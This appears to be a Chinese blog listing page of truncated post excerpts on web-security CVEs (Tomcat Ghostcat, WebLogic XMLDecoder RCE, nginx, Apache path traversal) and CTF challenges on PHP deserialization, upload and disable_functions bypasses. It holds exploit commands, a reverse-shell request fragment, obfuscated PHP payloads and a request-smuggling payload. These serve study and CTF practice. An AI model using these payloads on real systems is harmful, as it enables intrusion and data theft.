qq_61142406的博客

CVE-2016-5385漏洞产生的原理：有了以上的铺垫，可以大概猜想，如果cgi处理解析后的环境变量时，没有进行安全检查，可能会被黑阔恶意利用。而httpoxy，恰是本次漏洞的切入点。在CGI(RFC 3875)的模式的时候， 会把http头部， 加上HTTP_ 前缀， 注册为环境变量。 如果在Header中发送一个Proxy:xxxxxx, 那么PHP就会把他注册为HTTP_PROXY环境变量，篡改着就可以在该代理服务器上监听这些请求。影响版本：PHP5.6.24版本修复了该漏洞，不会

cve-2020-1938Apache Tomcat 6Tomcat 7系列 <7.0.100Tomcat 8系列 < 8.5.51Tomcat 9 系列 <9.0.31读取配置文件python3 /root/桌面/cve-2020-1983/tomcat.py read_file --webapp=manager /WEB-INF/web.xml 192.168.64.142https://github.com/YDHCUI/CNVD-2020-10487-Tomcat

CVE-2017-10271远程代码执行漏洞**漏洞本质：**主要是由于wls组件使用了webservice来请求soap请求，所以通过构造SOAP(XML)格式的请求，在解析的过程中导致XMLDecoder反序列化漏洞，可导致执行任意命令影响版本10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 , 12.2.1.2反弹shellPOST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 192.168.64.142:7001U

cve-2017-7529原理：nginx在反向代理站点时，通常会将一些文件进行缓存，特别是静态文件，缓存部分存储在文件中，每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”，如果二次请求命中了该缓存文件，则Nginx会直接将该文件中的“HTTP返回包体”返回给用户在请求中包含range头，nginx将会根据指定的start和ed位置返回指定长度内容如果构造两个负位置，如(-600, -9223372036854774591)，将会读取到负位置的数据，如果这次请求又命中了缓存文件，

CVE-2019-11043特定配置的nginx+php-fpm的服务器会存在漏洞如下配置：location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... }可以使用换行符（％0a）来破坏fastcgi_split_path_info指令中的R

CVE-2017-15715：2.4.0~2.4.2900截断，后缀名后面加0A,1.php后面加上一个空格，然后双击空格，右边出现hex进制，然后改成0ACVE-2021-41773：目录穿越，Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数，但需要配合穿越的目录，配置 Require all granted，攻击者可利用该漏洞实现路径穿越从而读取任意文件，或者在配置了cgi的httpd程序中执行bash指令，从而有机会控制服务器。文件读取 payl

参考文章：https://www.anquanke.com/post/id/249446https://www.anquanke.com/post/id/220996https://www.anquanke.com/post/id/246516https://paper.seebug.org/1048/HTTP请求走私产生原因在http 1.1中加了keep-Alive和Pipeline知识点1.Content-Length <length>消息的长度，用十进制数字表示

知识点：AddType application/x-httpd-php .ahhh//http头添加使得.ahhh当作php脚本解析GIF89a文件头欺骗GIF89a12 12是为了补足8个字节，满足base64编码的规则绕过open_basedir无数字字母webshellpython上传脚本import requestsimport base64htaccess = b"""#define width 1337#define height 1337 AddType ap

源码：<?phpputenv('PATH=/home/rceservice/jail');if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|

某比赛的一个题，不知道结束没有，就不说名字了gunicorn <= 20.0.4，无论在gunicorn 前使用哪个代理，该漏洞都有效， Http头中的Sec-Websocket-Key: 1会进行特殊解析，从而引发此漏洞/fl4g禁止访问payload：echo -en "GET / HTTP/1.1\r
Host: localhost\r
Content-Length: 90\r
Sec-Websocket-Key1: x\r
\r
xxxxxxxxGET /fl4g HTT

https://xz.aliyun.com/t/3692#toc-13<?phpclass C1e4r{ public $test; public $str; public function __construct($name) { $this->str = $name; } public function __destruct() { $this->test = $this->str;

取反，可以使用yu师傅的脚本?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%92%90%9C%97%8A%C8%A2%D6%D6);绕disable_function找可上传的地方上传文件bypass_disablefun_x64.so和bypass_disablefunc.php（重命名为shell.php）然后包含一下shell.phphttp://site.com/bypass_disablefunc

<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>.

<?phpinclude "waf.php";class NISA{ public $fun="show_me_flag"; public $txw4ever; public function __wakeup() { if($this->fun=="show_me_flag"){ hint(); } } function __call($from,$val){ $thi

<?phpclass A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; }}class B{ function __destruct(){ echo $this->a->a();

MySQL传统处理：客户端准备sql语句发送sql语句到MySQL服务器MySQL服务器执行sql语句服务器执行结果返回客户端预处理基本策略：将sql语句强制一分为二：第一部分为前面相同命令和结构部分第二部分为后面可变数据部分首先将前面的sql语句发送给MySQL服务器，让其先执行溢出预处理（并没有真正的执行）第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示，比如问号?不带参数的预处理准备预处理语句prepare 语句名称 from “预处理的sql

if (isset($_GET['num'])){ //num=1e10，类型转化 $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>"; }else{ die("金钱解决不了穷人的本质问题").

源码<?phperror_reporting(0); class catalogue{ public $class; public $data; public function __construct() { $this->class = "error"; $this->data = "hacker"; } public function __destruct() { echo

源码： <?phphighlight_file(__FILE__);class a{ public $un0; public $un1; public $un2; public $un3; public $un4; public function __destruct(){ if(!empty($this->un0) && empty($this->un2)){ $th

无数字字母webshell之自增